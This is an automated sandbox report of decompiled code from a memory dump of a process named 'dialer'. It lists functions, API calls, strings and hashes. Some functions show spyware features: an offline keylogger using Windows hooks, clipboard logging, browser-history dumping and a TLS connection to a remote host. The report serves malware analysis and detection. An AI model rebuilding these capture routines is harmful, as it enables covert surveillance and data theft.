								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E0042F61B(_v8 ^ _t102);
			}

0x00445bf4
0x00445bff
0x00445c06
0x00445c0b
0x00445c0b
0x00445c28
0x00445d20
0x00445d26
0x00445d28
0x00445d29
0x00445d29
0x00445d2b
0x00445d31
0x00445d31
0x00445d33
0x00445d35
0x00445d3e
0x00445d41
0x00445d4d
0x00445d54
0x00445d64
0x00445d56
0x00445d56
0x00445d59
0x00445d59
0x00445d59
0x00445d5d
0x00445d5d
0x00000000
0x00445d5d
0x00445d43
0x00445d43
0x00445d48
0x00445d48
0x00445d60
0x00445d60
0x00445d60
0x00445d66
0x00445d6c
0x00445d72
0x00445d73
0x00445d73
0x00445c2e
0x00445c2e
0x00445c30
0x00445c30
0x00445c37
0x00445c38
0x00445c3c
0x00445c42
0x00445c48
0x00445c70
0x00445c70
0x00445c72
0x00000000
0x00000000
0x00445c51
0x00445c55
0x00445c67
0x00445c67
0x00445c69
0x00000000
0x00000000
0x00445c5a
0x00445c5c
0x00445c5e
0x00445c66
0x00445c66
0x00000000
0x00445c66
0x00000000
0x00445c5c
0x00445c6b
0x00445c6b
0x00445c6e
0x00445c6e
0x00445c8a
0x00445cab
0x00445cd3
0x00445cdb
0x00445cdd
0x00445cdd
0x00445ce7
0x00445cf7
0x00445cf9
0x00445d10
0x00445cfb
0x00445cfb
0x00445cfb
0x00445cfb
0x00445d00
0x00000000
0x00445d00
0x00445ce9
0x00445ce9
0x00445cee
0x00445d07
0x00445d07
0x00445d07
0x00445d17
0x00445d18
0x00445d1c
0x00445d87

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00445C19

Strings

&aD, xrefs: 00445C0B
, xrefs: 00445C5E

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Info
String ID: $&aD
API String ID: 1807457897-421791053
Opcode ID: 8d964efd6b3121c74041cdbab71bb2e0bb5ac18756e4e91b7d50e641ce1e5b99
Instruction ID: 340f2076e44652f60cd3fa2e3e4a4f6eee6cbcc0bbf4cc1f7aab0cdbf65fd6e0
Opcode Fuzzy Hash: 8d964efd6b3121c74041cdbab71bb2e0bb5ac18756e4e91b7d50e641ce1e5b99
Instruction Fuzzy Hash: 3C413BB090475C9BEF218E24CCC4AF6BBA9DF45708F1404EEE58A87143D2399E46DF24

Uniqueness

Uniqueness Score: -1.00%

Function 0040412D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93
sleepCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040412D(void* __ebx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __edi;
				WCHAR* _t40;
				struct HINSTANCE__* _t81;
				struct HINSTANCE__* _t84;
				void* _t85;

				_t48 = __ebx;
				_t81 = 0;
				GetModuleFileNameW(0,  &_v692, 0x104);
				E004020B5(__ebx,  &_v52);
				E00417967( &_v28, 0x30, L00401F75(E004169EB( &_v76)));
				L00401FA7();
				L00401F75(0x46c1a0);
				E00413CCA(L00401ECB(E00403086(_t48,  &_v100, E00404409(_t48,  &_v124, E004043E5(_t48,  &_v148,  &_v692, 0, E0040425F(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				_t84 = 0;
				while(1) {
					_t40 = L00401ECB( &_v28);
					_t80 =  &_v52;
					if(E00417334(_t40,  &_v52) != 0) {
						break;
					}
					Sleep(0xfa);
					_t84 =  &(_t84->i);
					if(_t84 < 0x14) {
						continue;
					} else {
					}
					L5:
					L00401ED0();
					L00401FA7();
					return _t81;
				}
				E004020CC(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
				_push(0x9d);
				E00404A6E(_t48, 0x46c138, _t80, __eflags);
				_t81 = 1;
				__eflags = 1;
				goto L5;
			}

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404147

Part of subcall function 004169EB: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040415D), ref: 00416A12

Part of subcall function 00413CCA: CloseHandle.KERNEL32(004041D6,?,004041D6,0045F454), ref: 00413CE0
Part of subcall function 00413CCA: CloseHandle.KERNEL32(0045F454,?,004041D6,0045F454), ref: 00413CE9

Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351

Sleep.KERNEL32(000000FA,0045F454), ref: 00404219

Strings

/sort "Visit Time" /stext ", xrefs: 00404193

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "
API String ID: 368326130-1573945896
Opcode ID: 4035527b6a06ba8322556ec4bf730b267a5f89deb7f1e16ed7a21f7ae8ceee55
Instruction ID: 077a0f2c23c77d26b68de5e3cb7190eb75c300570ed309256026d755c7120731
Opcode Fuzzy Hash: 4035527b6a06ba8322556ec4bf730b267a5f89deb7f1e16ed7a21f7ae8ceee55
Instruction Fuzzy Hash: 5A318471A1021857CB14FBB6DC969EE7775AF90309F00007FB506B71E2EF381A4ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 00448967, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00448967(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				void* __esi;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t23 = _a4;
				_push(_t34);
				if(_t23 == 0) {
					L21:
					_t15 = E00441069(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t34 = 0x459f98;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t34) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t36 = 0x459fa0;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t36) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t48 = _t17;
								if(_t17 != 0) {
									_t16 = E0043604F(_t23, _t23);
									goto L25;
								}
								if(E00441069(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t36 = _t36 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t34 = _t34 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00448BC2,?,00000050,?,?,?,?,?), ref: 00448A42

Strings

OCP, xrefs: 004489BB
ACP, xrefs: 00448985

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: d9c45d5da0b8590e3521e2617c67b21db9c57a03ad6415d3095a97cbf1f12796
Instruction ID: eb9ed3db0900569e2555f6122bd78d83f5855a47a67a592497b5360646255e9a
Opcode Fuzzy Hash: d9c45d5da0b8590e3521e2617c67b21db9c57a03ad6415d3095a97cbf1f12796
Instruction Fuzzy Hash: 302106A2A00501A6FB348E559802BBF7366EB94B51F56802FE905F7301EF3ADD41C35A

Uniqueness

Uniqueness Score: -1.00%

Function 00409C17, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00409C17(void* __ecx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				void* __ebx;
				void* __esi;
				void* _t23;
				void* _t27;
				void* _t30;
				void* _t78;
				void* _t84;
				void* _t85;

				_t85 = _t84 - 0x94;
				_t78 = __ecx;
				if( *0x46dd0c >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E0042EA6C(0x46dd0c);
					_t88 =  *0x46dd0c - 0xffffffff;
					if( *0x46dd0c == 0xffffffff) {
						L00401F4D(0x46dd10, 0x46dd10);
						L0042EDF6(_t88, E00452055);
						E0042EA2D(0x46dd0c, 0x46dd0c);
					}
				}
				E00409BDB( &_v28);
				_t23 = L00409EAE(0x46dd10);
				_t89 = _t23;
				if(_t23 == 0) {
					L00409DD4(0x46dd10,  &_v28);
					_t27 = E004074E6(_t89);
					_t90 = _t27;
					if(_t27 != 0) {
						E00402064(0x46dd10,  &_v76, "\r\n[End of clipboard]\r\n");
						E00402064(0x46dd10,  &_v52, "\r\n[Text copied to clipboard]\r\n");
						_t30 = E00416C32( &_v148,  &_v76);
						E00403010(_t85 - 0x18, E00404409(0x46dd10,  &_v100, E00416C32( &_v124,  &_v52), _t90, 0x46dd10), _t30);
						E00408B82(_t78);
						L00401ED0();
						L00401ED0();
						L00401ED0();
						L00401FA7();
						L00401FA7();
					}
				}
				return L00401ED0();
			}

0x00409c20
0x00409c35
0x00409c3d
0x00409c45
0x00409c4a
0x00409c52
0x00409c56
0x00409c60
0x00409c66
0x00409c6c
0x00409c52
0x00409c71
0x00409c7b
0x00409c80
0x00409c82
0x00409c8e
0x00409c9b
0x00409ca0
0x00409ca2
0x00409cb0
0x00409cbd
0x00409ccb
0x00409cf1
0x00409cf9
0x00409d01
0x00409d09
0x00409d14
0x00409d1c
0x00409d24
0x00409d24
0x00409ca2
0x00409d37

APIs

Part of subcall function 0042EDF6: __onexit.LIBCMT ref: 0042EDFC

__Init_thread_footer.LIBCMT ref: 00409C66

Strings

[End of clipboard], xrefs: 00409CA8
[Text copied to clipboard], xrefs: 00409CB5

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: b232ca497829120154d4a697c2f7c4807001b97ce85b09419822ff7f71be9a4a
Instruction ID: c10fa831a6e84450874ba0060521734b3f9fe5e8b1c89bb2abb32f216f2cd542
Opcode Fuzzy Hash: b232ca497829120154d4a697c2f7c4807001b97ce85b09419822ff7f71be9a4a
Instruction Fuzzy Hash: 24216D31A102188ACB14FB66E8929EDB339AF54714F50003FF501771D3EF3C6E4A8A99

Uniqueness

Uniqueness Score: -1.00%

Function 004049D2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
networkCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004049D2(void* __edx, char _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t12;
				signed int _t15;
				void* _t16;
				void* _t22;
				void* _t23;
				signed int _t25;
				void* _t31;
				char* _t32;
				void* _t33;

				_t22 = _t23;
				_t32 =  &_a4;
				_t2 = _t22 + 8; // 0x46db88
				_t12 = _t2;
				_t31 = _t12;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				__imp__#4( *((intOrPtr*)(_t22 + 4)), _t12, 0x10);
				if(_t12 != 0) {
					L5:
					return 0;
				}
				if( *((intOrPtr*)(_t22 + 1)) == _t12) {
					L9:
					return 1;
				}
				_t15 = E0041C076(_t22, _t23);
				 *(_t22 + 0x44) = _t15;
				if(_t15 == 0) {
					goto L5;
				}
				_t30 =  *((intOrPtr*)(_t22 + 4));
				_t16 = E0041C0C4(_t15,  *((intOrPtr*)(_t22 + 4)));
				_t25 =  *(_t22 + 0x44);
				if(_t16 == 1) {
					if(E0041CB45() == 1) {
						goto L9;
					}
					_t34 = _t33 - 0x18;
					E00402064(_t22, _t33 - 0x18, "TLS Authentication failed");
					E00402064(_t22, _t34 - 0x18, "[ERROR]");
					_t16 = E0041C23F(E004165D8(_t22, _t31),  *(_t22 + 0x44));
					_t25 =  *(_t22 + 0x44);
				}
				E0041C0BB(_t16, _t22, _t25, _t30, _t31, _t32);
				 *(_t22 + 0x44) =  *(_t22 + 0x44) & 0x00000000;
				goto L5;
			}

0x004049d9
0x004049db
0x004049e0
0x004049e0
0x004049e3
0x004049e9
0x004049ea
0x004049eb
0x004049ec
0x004049ed
0x004049f5
0x00404a23
0x00000000
0x00404a23
0x004049fa
0x00404a6a
0x00000000
0x00404a6a
0x004049fc
0x00404a01
0x00404a06
0x00000000
0x00000000
0x00404a08
0x00404a0d
0x00404a12
0x00404a18
0x00404a35
0x00000000
0x00000000
0x00404a37
0x00404a41
0x00404a50
0x00404a60
0x00404a65
0x00404a65
0x00404a1a
0x00404a1f
0x00000000

APIs

connect.WS2_32(?,0046DB88,00000010), ref: 004049ED

Strings

TLS Authentication failed, xrefs: 00404A3C
[ERROR], xrefs: 00404A4B

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: connect
String ID: TLS Authentication failed$[ERROR]
API String ID: 1959786783-1964023390
Opcode ID: a0453b0af56f1dce6b96b2c1e2c6577e21eb645f310f987bcb19a5c47a82d2d8
Instruction ID: 152706162a58c733358066f3432b6da4ca359658ad3caf7888de26e0204257cf
Opcode Fuzzy Hash: a0453b0af56f1dce6b96b2c1e2c6577e21eb645f310f987bcb19a5c47a82d2d8
Instruction Fuzzy Hash: 6401E9717802005BCF18BFB59A8657A3B56DF82305B04406BEE01AF2C7E97ADC44876E

Uniqueness

Uniqueness Score: -1.00%

Function 004165D8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
timeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004165D8(void* __ebx, void* __edi, char _a4, char _a28) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed short _v106;
				signed short _v108;
				signed int _t57;
				struct _SYSTEMTIME* _t59;

				_t59 = (_t57 & 0xfffffff8) - 0x70;
				_t61 =  *0x46bb07;
				if( *0x46bb07 != 0) {
					GetLocalTime(_t59);
					_push(_v102 & 0x0000ffff);
					_push(_v104 & 0x0000ffff);
					_push(_v106 & 0x0000ffff);
					_t7 =  &_a4; // 0x404a5a
					E004047F8(_t61, L00401F75(E0040530D(__ebx,  &_v100, L00402F73(__ebx,  &_v76, E0040530D(__ebx,  &_v52, E004075E8( &_v28, "%02i:%02i:%02i:%03i ", _t61, _t7), __edi, _t61, " "), _t61,  &_a28), __edi, _t61, "\n")), _v108 & 0x0000ffff);
					L00401FA7();
					L00401FA7();
					L00401FA7();
					L00401FA7();
				}
				L00401FA7();
				return L00401FA7();
			}

0x004165de
0x004165e1
0x004165e8
0x004165f2
0x00416601
0x0041660c
0x00416612
0x00416622
0x0041665d
0x00416669
0x00416672
0x0041667b
0x00416684
0x00416684
0x0041668c
0x0041669c

APIs

GetLocalTime.KERNEL32(00000000), ref: 004165F2

Strings

%02i:%02i:%02i:%03i , xrefs: 00416607
ZJ@, xrefs: 00416689, 00416622, 0041662A

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: %02i:%02i:%02i:%03i $ZJ@
API String ID: 481472006-4006433000
Opcode ID: e0da1838b9dbf299b852b96bc5900241f7eebd36658fbaaf16804b458b3330c9
Instruction ID: 91ad0787fd8fe1f6f1bb0b9fd36296fe35f2cd8cc1b5ade7d46838038b6d9cab
Opcode Fuzzy Hash: e0da1838b9dbf299b852b96bc5900241f7eebd36658fbaaf16804b458b3330c9
Instruction Fuzzy Hash: D5113DB150834556C704FBA5DC55CABB3E8AA44308F500A3FB895D30E1FF3CEA49C65A

Uniqueness

Uniqueness Score: -1.00%

Function 004095AB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004095AB(void* __ebx, struct HHOOK__** __ecx) {
				char _v28;
				void* __edi;
				struct HHOOK__** _t27;
				void* _t28;

				_t17 = __ebx;
				_t27 = __ecx;
				if( *((char*)(__ecx + 0x49)) == 0) {
					__eflags = 0;
					return 0;
				}
				_t33 =  *0x46a9d4 - 0x32;
				_t26 = "Offline Keylogger Stopped";
				if( *0x46a9d4 != 0x32) {
					E00402064(__ebx,  &_v28, "Offline Keylogger Stopped");
					_t28 = _t28 - 0x18;
					E00416C32(_t28,  &_v28);
					E00409636(__ebx, _t27, _t33);
					L00401FA7();
				}
				_t29 = _t28 - 0x18;
				E00402064(_t17, _t28 - 0x18, _t26);
				E00402064(_t17, _t29 - 0x18, "[Info]");
				E004165D8(_t17, _t26);
				_t27[0x12] = 0;
				if(_t27[0x12] == 0 &&  *_t27 != 0) {
					UnhookWindowsHookEx( *_t27);
					 *_t27 =  *_t27 & 0x00000000;
				}
				return 1;
			}

APIs

UnhookWindowsHookEx.USER32(?), ref: 00409621

Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
Part of subcall function 00409636: SetEvent.KERNEL32(00000000,00000000), ref: 004096EF

Strings

Offline Keylogger Stopped, xrefs: 004095C2, 004095C9, 004095F3
[Info], xrefs: 004095FE

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: EventHookLocalTimeUnhookWindowswsprintf
String ID: Offline Keylogger Stopped$[Info]
API String ID: 2949427887-1791908007
Opcode ID: 2eede6a45286f0b92d76a8083913078e6b473394a1b3c67eac4823fa027206c7
Instruction ID: f59fa6ee72642e8cb032df677130fc087113d3809d92fc1fd18dfcd0b65af9b3
Opcode Fuzzy Hash: 2eede6a45286f0b92d76a8083913078e6b473394a1b3c67eac4823fa027206c7
Instruction Fuzzy Hash: 3201D231A0460057DB297779C90B3BE7BA14B42305F40047FD982222D3EABE495AC7DB

Uniqueness

Uniqueness Score: -1.00%

Function 0044132F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E0044132F(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x46a00c; // 0x3dad585e
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t31 = E00440C46(0x16, "LCMapStringEx", 0x4590ec, 0x4590f4);
				if(_t31 == 0) {
					LCMapStringW(E004413B7(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x45346c(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E0042F61B(_v8 ^ _t33);
			}

0x0044132f
0x00441334
0x00441335
0x0044133c
0x0044133f
0x00441356
0x0044135d
0x004413a0
0x0044135f
0x0044137c
0x00441382
0x00441382
0x004413b4

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,00428772), ref: 004413A0

Strings

@, xrefs: 0044137C
LCMapStringEx, xrefs: 0044134A

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: String
String ID: LCMapStringEx$@
API String ID: 2568140703-230199810
Opcode ID: d8b27bcf48bc9654abab763dba499bbd76732c53fd0bf8c262b8ba2a6f0e4add
Instruction ID: 328293ae2da74c3881d3de9e1e1d62cea5772e6c780c88eb29c835c9fd5874b5
Opcode Fuzzy Hash: d8b27bcf48bc9654abab763dba499bbd76732c53fd0bf8c262b8ba2a6f0e4add
Instruction Fuzzy Hash: 3C012532500209FBDF125F90DC02EEE7F62EF08755F004126FE0426161CA3AC971EB99

Uniqueness

Uniqueness Score: -1.00%

Function 00441129, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39timeCOMMON

Download Yara Rule

APIs

GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004401EB,?,00000000,00401D19), ref: 00441182

Strings

GetTimeFormatEx, xrefs: 0044113A, 00441144
@, xrefs: 0044116D

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: FormatTime
String ID: GetTimeFormatEx$@
API String ID: 3606616251-597012884
Opcode ID: e18defe2a157fc6ceb45431b8018b2d218c0bef47ea8d3fbbce7efe0c819ccca
Instruction ID: 597dd883ab71028faa77f39812b87aa423b0666660f34cf126ad643169d29e88
Opcode Fuzzy Hash: e18defe2a157fc6ceb45431b8018b2d218c0bef47ea8d3fbbce7efe0c819ccca
Instruction Fuzzy Hash: DCF0C83164021CFBDF126F61DC02EAF7F21EF08B51F10452AFE05172A1CA798D259B99

Uniqueness

Uniqueness Score: -1.00%

Function 00441199, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00441199(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t7;
				void* _t20;
				intOrPtr* _t23;
				signed int _t25;

				_t20 = __edx;
				_t16 = __ecx;
				_push(__ecx);
				_t7 =  *0x46a00c; // 0x3dad585e
				_v8 = _t7 ^ _t25;
				_t23 = E00440C46(0x11, "GetUserDefaultLocaleName", 0x4590a4, "GetUserDefaultLocaleName");
				if(_t23 == 0) {
					E004412C5(__ebx, _t16, _t20, __edi, _t23, __eflags, GetUserDefaultLCID(), _a4, _a8, 0);
				} else {
					 *0x45346c(_a4, _a8);
					 *_t23();
				}
				return E0042F61B(_v8 ^ _t25);
			}

0x00441199
0x00441199
0x0044119e
0x0044119f
0x004411a6
0x004411c0
0x004411c7
0x004411ea
0x004411c9
0x004411d1
0x004411d7
0x004411d7
0x004411fd

APIs

GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00448438,?,00000055,00000050), ref: 004411E3

Strings

@, xrefs: 004411D1
GetUserDefaultLocaleName, xrefs: 004411AA, 004411B4

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: DefaultUser
String ID: GetUserDefaultLocaleName$@
API String ID: 3358694519-2432190263
Opcode ID: 90c388354acc68b76619c00604a582a4408c9a1ccc77837c827a5096964a56ca
Instruction ID: 3ac9f703888ec721985dbf6bd802d6cf8197e55589d78a152d54f94c28d6ea82
Opcode Fuzzy Hash: 90c388354acc68b76619c00604a582a4408c9a1ccc77837c827a5096964a56ca
Instruction Fuzzy Hash: 90F02B30600218FBDB106F61DC02E5E7FA0EF04B11F104466FD05561A2DA758E149BDD

Uniqueness

Uniqueness Score: -1.00%

Function 00441262, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00441262(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t5;
				intOrPtr* _t18;
				signed int _t20;

				_t13 = __ecx;
				_push(__ecx);
				_t5 =  *0x46a00c; // 0x3dad585e
				_v8 = _t5 ^ _t20;
				_push(__esi);
				_t18 = E00440C46(0x15, "IsValidLocaleName", 0x4590d0, "IsValidLocaleName");
				if(_t18 == 0) {
					IsValidLocale(E004413B7(_t13, _t18, __eflags, _a4, 0), 1);
				} else {
					 *0x45346c(_a4);
					 *_t18();
				}
				return E0042F61B(_v8 ^ _t20);
			}

0x00441262
0x00441267
0x00441268
0x0044126f
0x00441272
0x00441289
0x00441290
0x004412ae
0x00441292
0x00441297
0x0044129d
0x0044129d
0x004412c2

APIs

IsValidLocale.KERNEL32(00000000,0043CFD0,00000000,00000001,?,?,0043CFD0,?,?,0043C9B0,?,00000004), ref: 004412AE

Strings

IsValidLocaleName, xrefs: 00441273, 0044127D
@, xrefs: 00441297

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$@
API String ID: 1901932003-2778040366
Opcode ID: af6bfaf10eedc7b2d13639744446c0f101df4d5affd74620e5c0cda37b3ac205
Instruction ID: 51e1be3ffe8f4d9107f84abeff18eb9e3ab6bbbe641bbbca65fbd3cae13f37de
Opcode Fuzzy Hash: af6bfaf10eedc7b2d13639744446c0f101df4d5affd74620e5c0cda37b3ac205
Instruction Fuzzy Hash: 23F05930640708F7DB106F20DC02FAE7B54DB00B12F10016AFD05B72D1DAB88D148A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00441200, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00441200(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0x46a00c; // 0x3dad585e
				_v8 = _t8 ^ _t22;
				_t20 = E00440C46(0x14, "InitializeCriticalSectionEx", 0x4590c8, 0x4590d0);
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x45346c(_a4, _a8, _a12);
					 *_t20();
				}
				return E0042F61B(_v8 ^ _t22);
			}

0x00441205
0x00441206
0x0044120d
0x00441227
0x0044122e
0x0044124b
0x00441230
0x0044123b
0x00441241
0x00441241
0x0044125f

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044437F,-00000020,00000FA0,00000000,?,?), ref: 0044124B

Strings

@, xrefs: 0044123B
InitializeCriticalSectionEx, xrefs: 0044121B

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

